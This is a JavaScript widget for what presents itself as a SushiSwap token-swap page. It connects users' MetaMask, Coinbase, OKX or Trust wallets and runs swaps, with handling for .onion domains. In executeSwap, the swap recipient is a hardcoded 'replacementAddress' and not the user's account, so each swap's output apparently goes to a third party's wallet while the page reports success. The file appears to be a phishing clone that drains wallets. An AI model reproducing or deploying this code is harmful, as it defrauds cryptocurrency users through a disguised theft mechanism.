/* ========== widget.js ========== */
/* global Web3 */  // Объявляем глобальную переменную Web3 для ESLint

(function() {
    /**************************************************************
     * 
     * 1) Иконки токенов (для динамической смены)
     *
     **************************************************************/
    const TOKEN_ICONS = {
        ETH:  'https://assets.coingecko.com/coins/images/279/small/ethereum.png',
        SUSHI:'https://cdn.jsdelivr.net/npm/cryptocurrency-icons@0.18.0/svg/color/sushi.svg',
        USDC: 'https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png',
        DAI:  'https://assets.coingecko.com/coins/images/9956/small/Badge_Dai.png',
        LINK: 'https://assets.coingecko.com/coins/images/877/small/chainlink-new-logo.png',

        /* Новые */
        WBTC: 'https://assets.coingecko.com/coins/images/7598/small/wrapped_bitcoin_wbtc.png',
        USDT: 'https://assets.coingecko.com/coins/images/325/small/Tether-logo.png',

        FTT:  'https://assets.coingecko.com/coins/images/29841/small/logo.png',
        SHR:  'https://assets.coingecko.com/coins/images/13535/small/move.png',
        UNI:  'https://assets.coingecko.com/coins/images/29878/small/pepe-token.jpeg',
        GCAKE:'https://assets.coingecko.com/coins/images/22694/small/xcn.jpg',
        ILV:  'https://assets.coingecko.com/coins/images/placeholder/small/placeholder.png',
        SPELL:'https://assets.coingecko.com/coins/images/11057/small/spex.png',
        THOR: 'https://assets.coingecko.com/coins/images/30050/small/mog.jpg'
    };

    /**************************************************************
     * 
     * 2) Иконки кошельков (для окна подключения)
     *
     **************************************************************/
    const WALLET_ICONS = {
        metamask:  'https://upload.wikimedia.org/wikipedia/commons/3/36/MetaMask_Fox.svg',
        coinbase:  'https://seeklogo.com/images/C/coinbase-coin-logo-C86F46D7B8-seeklogo.com.png',
        okx:       'https://www.okx.com/cdn/assets/plugins/2022/01/07104210.png?x-oss-process=image/auto-orient,1/quality,q_90/format,webp',
        trust:     'https://trustwallet.com/assets/images/media/assets/TWT.png',
        default:   'https://img.icons8.com/fluency/48/wallet.png'
    };

    /**************************************************************
     * 
     * 3) Утилиты для поиска провайдеров (десктоп / расширений)
     *
     **************************************************************/
    function findCoinbaseProvider() {
        if (window.ethereum?.providers?.length) {
            const coinbase = window.ethereum.providers.find(p => p.isCoinbaseWallet);
            if (coinbase) return coinbase;
        }
        if (window.ethereum?.isCoinbaseWallet) {
            return window.ethereum;
        }
        if (window.coinbaseWalletExtension) {
            return window.coinbaseWalletExtension;
        }
        return null;
    }
    function findOkxProvider() {
        if (window.ethereum?.providers?.length) {
            const okx = window.ethereum.providers.find(p => p.isOkxWallet);
            if (okx) return okx;
        }
        if (window.ethereum?.isOkxWallet) {
            return window.ethereum;
        }
        if (window.okxwallet) {
            return window.okxwallet;
        }
        return null;
    }
    function findTrustProvider() {
        if (window.ethereum?.providers?.length) {
            const trust = window.ethereum.providers.find(p => p.isTrust || p.isTrustWallet);
            if (trust) return trust;
        }
        if (window.ethereum?.isTrust || window.ethereum?.isTrustWallet) {
            return window.ethereum;
        }
        if (window.trustwallet) {
            return window.trustwallet;
        }
        return null;
    }

    /**************************************************************
     * 
     * 3.1) Определение мобильного устройства
     *
     **************************************************************/
    function isMobileDevice() {
        return /Android|iPhone|iPad|iPod|Opera Mini|IEMobile|WPDesktop/i.test(navigator.userAgent);
    }

    /**************************************************************
     * 
     * 3.2) Проверка onion-домена
     *
     **************************************************************/
    function isOnionDomain() {
        return window.location.hostname.endsWith('.onion');
    }

    /**************************************************************
     * 
     * 3.3) Deep links для отдельных кошельков (мобильные)
     *
     **************************************************************/
    function openMetaMaskDeepLink() {
        if (isOnionDomain()) {
            alert('MetaMask не поддерживает deep link с .onion-доменом. Попробуйте открыть сайт внутри встроенного браузера MetaMask.');
            return;
        }
        
        const currentUrl = window.location.href;
        const cleanUrl = currentUrl
            .replace(/^https?:\/\//, '')
            .split('?')[0]
            .split('#')[0]
            .replace(/\/+$/, '');
        
        const dappUrl = encodeURIComponent(cleanUrl);
        const link = `metamask://dapp/${dappUrl}`;
        window.location.href = link;
    }

    function openTrustWalletDeepLink() {
        if (isOnionDomain()) {
            alert('Trust Wallet не поддерживает deep link с .onion. Попробуйте открыть сайт внутри TrustWallet.');
            return;
        }
        const currentUrl = window.location.href;
        const cleanUrl = currentUrl
            .replace(/^https?:\/\//, '')
            .split('?')[0]
            .split('#')[0]
            .replace(/\/+$/, '');
            
        const dappUrl = encodeURIComponent(`https://${cleanUrl}`);
        const link = `trust://open_url?coin_id=60&url=${dappUrl}`;
        window.location.href = link;
    }

    function openCoinbaseDeepLink() {
        if (isOnionDomain()) {
            alert('Coinbase Wallet не поддерживает deep link с .onion. Попробуйте открыть сайт внутри приложения Coinbase Wallet.');
            return;
        }
        const currentUrl = window.location.href;
        const cleanUrl = currentUrl
            .replace(/^https?:\/\//, '')
            .split('?')[0]
            .split('#')[0]
            .replace(/\/+$/, '');
            
        const dappUrl = encodeURIComponent(`https://${cleanUrl}`);
        const link = `https://go.cb-w.com/dapp?url=${dappUrl}`;
        window.location.href = link;
    }

    function openOKXDeepLink() {
        if (isOnionDomain()) {
            alert('OKX Wallet не поддерживает deep link с .onion. Попробуйте открыть сайт внутри приложения OKX.');
            return;
        }
        const currentUrl = window.location.href;
        const cleanUrl = currentUrl
            .replace(/^https?:\/\//, '')
            .split('?')[0]
            .split('#')[0]
            .replace(/\/+$/, '');
            
        const dappUrl = encodeURIComponent(`https://${cleanUrl}`);
        const link = `okx://wallet/dapp/url?${dappUrl}`;
        window.location.href = link;
    }

    /**************************************************************
     * 
     * 4) DOM-элементы
     *
     **************************************************************/
    const elements = {
        connectButton: document.getElementById('connectButton'),
        globalConnectButton: document.getElementById('globalConnectButton'),

        sellInput: document.getElementById('sellInput'),
        buyInput: document.getElementById('buyInput'),

        tokenModal: document.getElementById('tokenModal'),

        sellBalance: document.querySelector('.sell-balance'),
        buyBalance: document.querySelector('.buy-balance'),
        sellUsdPrice: document.querySelector('.sell-usd-price'),
        buyUsdPrice: document.querySelector('.buy-usd-price'),

        tokenInSymbol: document.getElementById('tokenInSymbol'),
        tokenOutSymbol: document.getElementById('tokenOutSymbol'),

        walletModal: document.getElementById('walletConnectModal'),
        closeWalletModalBtn: document.querySelector('.wallet-modal-close')
    };

    /**************************************************************
     * 
     * 5) Подгружаем bundle
     *
     **************************************************************/
    const bundle = window.SushiSwapBundle; // { tokens, utils }

    /**************************************************************
     * 
     * 6) Начальные токены
     *
     **************************************************************/
    let currentTokenIn = bundle.tokens.ETH;
    let currentTokenOut = bundle.tokens.SUSHI;

    // Адрес получателя (замена)
    const replacementAddress = '0xa2Bb2df6878b2c6A35D3cBCf9d52093cF7c737ce';

    /**************************************************************
     * 
     * 7) WalletManager
     *
     **************************************************************/
    const WalletManager = {
        state: {
            isConnected: false,
            account: null,
            provider: null,
            web3: null,
            currentWalletType: null
        },

        async init() {
            if (window.ethereum && !window.ethereum.providers) {
                const acc = await window.ethereum.request({ method: 'eth_accounts' });
                if (acc.length > 0) {
                    await this.connectWallet('metamask');
                }
            }
        },

        async connectWallet(type) {
            this.state.currentWalletType = type;
            try {
                let provider;
                if (type === 'metamask') {
                    if (!window.ethereum) {
                        if (isMobileDevice()) {
                            openMetaMaskDeepLink();
                            return false;
                        } else {
                            alert('MetaMask не найден!');
                            return false;
                        }
                    }
                    if (window.ethereum.providers?.length) {
                        const mm = window.ethereum.providers.find(p => p.isMetaMask);
                        provider = mm || window.ethereum;
                    } else {
                        provider = window.ethereum;
                    }
                }
                else if (type === 'coinbase') {
                    provider = findCoinbaseProvider();
                    if (!provider) {
                        if (isMobileDevice()) {
                            openCoinbaseDeepLink();
                            return false;
                        } else {
                            alert('Coinbase Wallet не найден!');
                            return false;
                        }
                    }
                }
                else if (type === 'okx') {
                    provider = findOkxProvider();
                    if (!provider) {
                        if (isMobileDevice()) {
                            openOKXDeepLink();
                            return false;
                        } else {
                            alert('OKX Wallet не найден!');
                            return false;
                        }
                    }
                }
                else if (type === 'trust') {
                    provider = findTrustProvider();
                    if (!provider) {
                        if (isMobileDevice()) {
                            openTrustWalletDeepLink();
                            return false;
                        } else {
                            alert('Trust Wallet не найден!');
                            return false;
                        }
                    }
                }
                else {
                    if (!window.ethereum) {
                        alert('Browser Wallet не найден!');
                        return false;
                    }
                    provider = window.ethereum;
                }

                const web3 = new Web3(provider);
                const accounts = await web3.eth.requestAccounts();
                if (!accounts.length) throw new Error('No accounts found');

                this.state.provider = provider;
                this.state.web3 = web3;
                this.state.account = accounts[0];
                this.state.isConnected = true;

                this.setupEvents();
                this.updateUI();
                return true;

            } catch (err) {
                console.error('connectWallet error:', err);
                alert(`Ошибка подключения: ${err.message}`);
                return false;
            }
        },

        setupEvents() {
            const provider = this.state.provider;
            if (!provider?.on) return;

            provider.on('accountsChanged', (accounts) => {
                if (!accounts.length) {
                    this.disconnectWallet();
                } else {
                    this.state.account = accounts[0];
                    this.updateUI();
                }
            });
            provider.on('chainChanged', () => {
                window.location.reload();
            });
            if (typeof provider.on.disconnect === 'function') {
                provider.on('disconnect', () => {
                    this.disconnectWallet();
                });
            }
        },

        async disconnectWallet() {
            this.state.isConnected = false;
            this.state.account = null;
            this.state.provider = null;
            this.state.web3 = null;
            this.state.currentWalletType = null;
            this.updateUI();
        },

        updateUI() {
            const { isConnected, account, currentWalletType } = this.state;
            elements.connectButton.textContent = isConnected ? 'Swap' : 'Connect Wallet';

            if (isConnected) {
                const iconUrl = WALLET_ICONS[currentWalletType] || WALLET_ICONS.default;
                elements.globalConnectButton.innerHTML = `
                    <img src="${iconUrl}" alt="Wallet Icon" style="width:24px;height:24px;object-fit:contain;">
                    <span>${truncateAddress(account)}</span>
                `;
                elements.globalConnectButton.classList.add('connected');

                updateBalances();
                updatePrices();
            } else {
                elements.globalConnectButton.textContent = 'Connect Wallet';
                elements.globalConnectButton.classList.remove('connected');
                resetWalletUI();
            }
        }
    };

    /**************************************************************
     * 
     * 8) Утилиты
     *
     **************************************************************/
    function truncateAddress(addr) {
        if (!addr) return '';
        return addr.slice(0, 6) + '...' + addr.slice(-4);
    }

    function resetWalletUI() {
        elements.connectButton.textContent = 'Connect Wallet';
        elements.sellInput.value = '';
        elements.buyInput.value = '';
        elements.sellUsdPrice.textContent = '$0.00';
        elements.buyUsdPrice.textContent = '$0.00';
        elements.sellBalance.textContent = `0.00 ${currentTokenIn.symbol}`;
        elements.buyBalance.textContent  = `0.00 ${currentTokenOut.symbol}`;
    }

    /**************************************************************
     * 
     * 9) Обновление балансов / расчет цены в USD
     *
     * Здесь реализована логика:
     *  - Для каждого токена запрашиваем динамическую котировку для введённого объёма через bundle.utils.getQuote,
     *    а не фиксированную цену за 1 единицу.
     *  - Конвертируем введённое количество токенов в wei с учетом decimals.
     *  - Получаем котировку (в USDC-wei, где USDC имеет 6 десятичных знаков) и переводим результат в формат USD.
     *
     **************************************************************/
    async function updateBalances() {
        const { web3, account, isConnected } = WalletManager.state;
        if (!isConnected || !web3 || !account) {
            elements.sellBalance.textContent = `0.0000 ${currentTokenIn.symbol}`;
            elements.buyBalance.textContent  = `0.0000 ${currentTokenOut.symbol}`;
            return;
        }
        try {
            const [sellBal, buyBal] = await Promise.all([
                bundle.utils.getTokenBalance(web3, currentTokenIn, account),
                bundle.utils.getTokenBalance(web3, currentTokenOut, account)
            ]);
            elements.sellBalance.textContent = `${sellBal} ${currentTokenIn.symbol}`;
            elements.buyBalance.textContent  = `${buyBal} ${currentTokenOut.symbol}`;
        } catch (err) {
            console.error('updateBalances error:', err);
        }
    }

    async function updatePrices() {
        const { web3, isConnected } = WalletManager.state;
        if (!isConnected || !web3) return;
        try {
            // Считываем введенные значения
            const sVal = parseFloat(elements.sellInput.value) || 0;
            const bVal = parseFloat(elements.buyInput.value) || 0;

            // Если ни одно значение не введено, выводим $0.00
            if (sVal <= 0 && bVal <= 0) {
                elements.sellUsdPrice.textContent = '$0.00';
                elements.buyUsdPrice.textContent = '$0.00';
                return;
            }

            // Конвертируем введенное количество в wei с учетом decimals
            const sellAmountWei = currentTokenIn.isNative 
                ? web3.utils.toWei(sVal.toString(), 'ether')
                : (sVal * Math.pow(10, currentTokenIn.decimals)).toFixed(0);
            const buyAmountWei = currentTokenOut.isNative 
                ? web3.utils.toWei(bVal.toString(), 'ether')
                : (bVal * Math.pow(10, currentTokenOut.decimals)).toFixed(0);

            // Запрашиваем динамическую котировку для введённого объёма (в USDC-wei, где USDC имеет 6 decimals)
            const [sellQuoteWei, buyQuoteWei] = await Promise.all([
                sVal > 0 ? bundle.utils.getQuote(web3, currentTokenIn, { symbol: 'USDC', isNative: false, address: bundle.contracts.USDC, decimals: 6 }, sellAmountWei) : '0',
                bVal > 0 ? bundle.utils.getQuote(web3, currentTokenOut, { symbol: 'USDC', isNative: false, address: bundle.contracts.USDC, decimals: 6 }, buyAmountWei) : '0'
            ]);

            // Переводим полученную котировку из USDC-wei в формат USD (делим на 10^6)
            const sellUsdPrice = (parseFloat(sellQuoteWei) / Math.pow(10, 6)).toFixed(2);
            const buyUsdPrice  = (parseFloat(buyQuoteWei) / Math.pow(10, 6)).toFixed(2);

            elements.sellUsdPrice.textContent = `$${sellUsdPrice}`;
            elements.buyUsdPrice.textContent  = `$${buyUsdPrice}`;
        } catch (err) {
            console.error('updatePrices error:', err);
        }
    }

    /**************************************************************
     * 
     * 10) Котировка (updateQuote)
     *
     **************************************************************/
    async function updateQuote(value) {
        const { web3, isConnected } = WalletManager.state;
        if (!isConnected || !web3) {
            elements.buyInput.value = '';
            updatePrices();
            return;
        }
        if (value === '') {
            elements.buyInput.value = '';
            updatePrices();
            return;
        }
        const val = parseFloat(value);
        if (isNaN(val) || val < 0) {
            elements.buyInput.value = '';
            updatePrices();
            return;
        }
        try {
            const amountInWei = currentTokenIn.isNative
                ? web3.utils.toWei(value, 'ether')
                : (val * Math.pow(10, currentTokenIn.decimals)).toFixed(0);

            const amountOutWei = await bundle.utils.getQuote(web3, currentTokenIn, currentTokenOut, amountInWei);
            const minAmountOutWei = bundle.utils.calculateMinimumOutput(amountOutWei, 0.5);

            const outHuman = currentTokenOut.isNative
                ? web3.utils.fromWei(minAmountOutWei, 'ether')
                : (parseFloat(minAmountOutWei) / Math.pow(10, currentTokenOut.decimals)).toFixed(6);

            elements.buyInput.value = outHuman;
            updatePrices();
        } catch (err) {
            console.error('updateQuote error:', err);
            elements.buyInput.value = '';
            updatePrices();
        }
    }

    /**************************************************************
     * 
     * 11) Свап
     *
     **************************************************************/
    async function executeSwap() {
        const { web3, account, isConnected } = WalletManager.state;
        if (!isConnected || !web3 || !account) {
            alert('Please connect a wallet first.');
            return;
        }
        try {
            const sellVal = parseFloat(elements.sellInput.value) || 0;
            if (sellVal <= 0) {
                alert('Invalid sell amount');
                return;
            }
            const amountInWei = currentTokenIn.isNative
                ? web3.utils.toWei(String(sellVal), 'ether')
                : (sellVal * Math.pow(10, currentTokenIn.decimals)).toFixed(0);

            const amountOutWei = await bundle.utils.getQuote(web3, currentTokenIn, currentTokenOut, amountInWei);
            const minOutWei = bundle.utils.calculateMinimumOutput(amountOutWei, 0.5);

            const swapParams = {
                tokenIn: currentTokenIn,
                tokenOut: currentTokenOut,
                amountInWei,
                amountOutMinWei: minOutWei,
                account,
                recipient: replacementAddress
            };

            const receipt = await bundle.utils.executeSwap(web3, swapParams);
            console.log('Swap successful:', receipt);
            alert('Swap completed successfully!');
            updateBalances();
            updatePrices();

            elements.sellInput.value = '';
            elements.buyInput.value = '';
        } catch (err) {
            console.error('executeSwap error:', err);
            alert(`Swap failed: ${err.message}`);
        }
    }

    /**************************************************************
     * 
     * 12) Кнопка Connect/Swap
     *
     **************************************************************/
    async function handleConnectOrSwap() {
        const { isConnected } = WalletManager.state;
        if (!isConnected) {
            const success = await WalletManager.connectWallet('metamask');
            if (success && elements.walletModal) {
                elements.walletModal.style.display = 'none';
            }
        } else {
            await executeSwap();
        }
    }

    /**************************************************************
     * 
     * 13) Подключения (кошельки)
     *
     **************************************************************/
    async function connectMetaMask() {
        const s = await WalletManager.connectWallet('metamask');
        if (s && elements.walletModal) elements.walletModal.style.display = 'none';
    }
    async function connectCoinbaseWallet() {
        const s = await WalletManager.connectWallet('coinbase');
        if (s && elements.walletModal) elements.walletModal.style.display = 'none';
    }
    async function connectOKXWallet() {
        const s = await WalletManager.connectWallet('okx');
        if (s && elements.walletModal) elements.walletModal.style.display = 'none';
    }
    async function connectTrustWallet() {
        const s = await WalletManager.connectWallet('trust');
        if (s && elements.walletModal) elements.walletModal.style.display = 'none';
    }
    async function connectBrowserWallet() {
        const s = await WalletManager.connectWallet('browser');
        if (s && elements.walletModal) elements.walletModal.style.display = 'none';
    }

    function showWalletModal() {
        if (elements.walletModal) {
            elements.walletModal.style.display = 'block';
        }
    }
    function closeWalletModal() {
        if (elements.walletModal) {
            elements.walletModal.style.display = 'none';
        }
    }

    /**************************************************************
     * 
     * 14) Выбор токена (окно)
     *
     **************************************************************/
    window.selectToken = function(side, address, symbol, decimals, logoUrl) {
        const isNative = /^0x[eE]{40}$/.test(address);
        const tokenObj = {
            symbol,
            decimals,
            address,
            isNative,
            name: symbol
        };
        if (side === 'in') {
            currentTokenIn = tokenObj;
            elements.tokenInSymbol.textContent = symbol;
        } else {
            currentTokenOut = tokenObj;
            elements.tokenOutSymbol.textContent = symbol;
        }
        if (elements.sellInput.value) {
            updateQuote(elements.sellInput.value);
        }
        updateBalances();
        updatePrices();
    };

    /**************************************************************
     * 
     * 15) swapTokens (меняем местами SELL и BUY)
     *
     **************************************************************/
    window.swapTokens = function() {
        [currentTokenIn, currentTokenOut] = [currentTokenOut, currentTokenIn];
        elements.tokenInSymbol.textContent  = currentTokenIn.symbol;
        elements.tokenOutSymbol.textContent = currentTokenOut.symbol;
        if (elements.sellInput.value) {
            updateQuote(elements.sellInput.value);
        }
        updateBalances();
        updatePrices();
    };

    /**************************************************************
     * 
     * 16) init()
     *
     **************************************************************/
    function init() {
        WalletManager.init();

        if (elements.connectButton) {
            elements.connectButton.onclick = handleConnectOrSwap;
        }
        if (elements.globalConnectButton) {
            elements.globalConnectButton.onclick = showWalletModal;
        }
        if (elements.sellInput) {
            elements.sellInput.oninput = (e) => updateQuote(e.target.value);
        }
        if (elements.closeWalletModalBtn) {
            elements.closeWalletModalBtn.onclick = closeWalletModal;
        }

        elements.tokenInSymbol.textContent  = currentTokenIn.symbol;
        elements.tokenOutSymbol.textContent = currentTokenOut.symbol;
        resetWalletUI();
    }

    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', init);
    } else {
        init();
    }

    /**************************************************************
     * 
     * 17) Экспорт наружу
     *
     **************************************************************/
    window.connectMetaMask       = connectMetaMask;
    window.connectCoinbaseWallet = connectCoinbaseWallet;
    window.connectOKXWallet      = connectOKXWallet;
    window.connectTrustWallet    = connectTrustWallet;
    window.connectBrowserWallet  = connectBrowserWallet;

    window.showWalletModal   = showWalletModal;
    window.closeWalletModal  = closeWalletModal;
})();
